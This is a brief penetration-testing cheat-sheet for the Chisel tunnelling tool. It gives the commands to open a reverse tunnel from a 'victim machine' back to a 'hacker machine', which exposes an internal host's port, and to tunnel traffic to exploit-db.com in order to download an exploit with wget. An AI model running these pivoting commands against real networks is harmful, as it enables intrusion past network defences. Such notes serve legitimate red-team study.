// Hacker Machine
// setup a reverse server and listen the port 12345
./chisel server -p 12345 --reverse
//Victim Machine
// Listen on hacker 1337, forward to dump host ip on port 8000
./chisel client [hacker IP]:12345 R:1337:[dump host ip]:8000
// Hacker Machine
http://localhost:1337/ => http://[dump host ip]:8000
TCP basic tunneling
// Chisel server 1.1.1.1
./chisel server -p 1234
// Chisel Client 2.2.2.2 port 1337
./chisel client 1.1.1.1:1234 1337:www.exploit-db.com:443
wget https://localhost:9001/raw/45782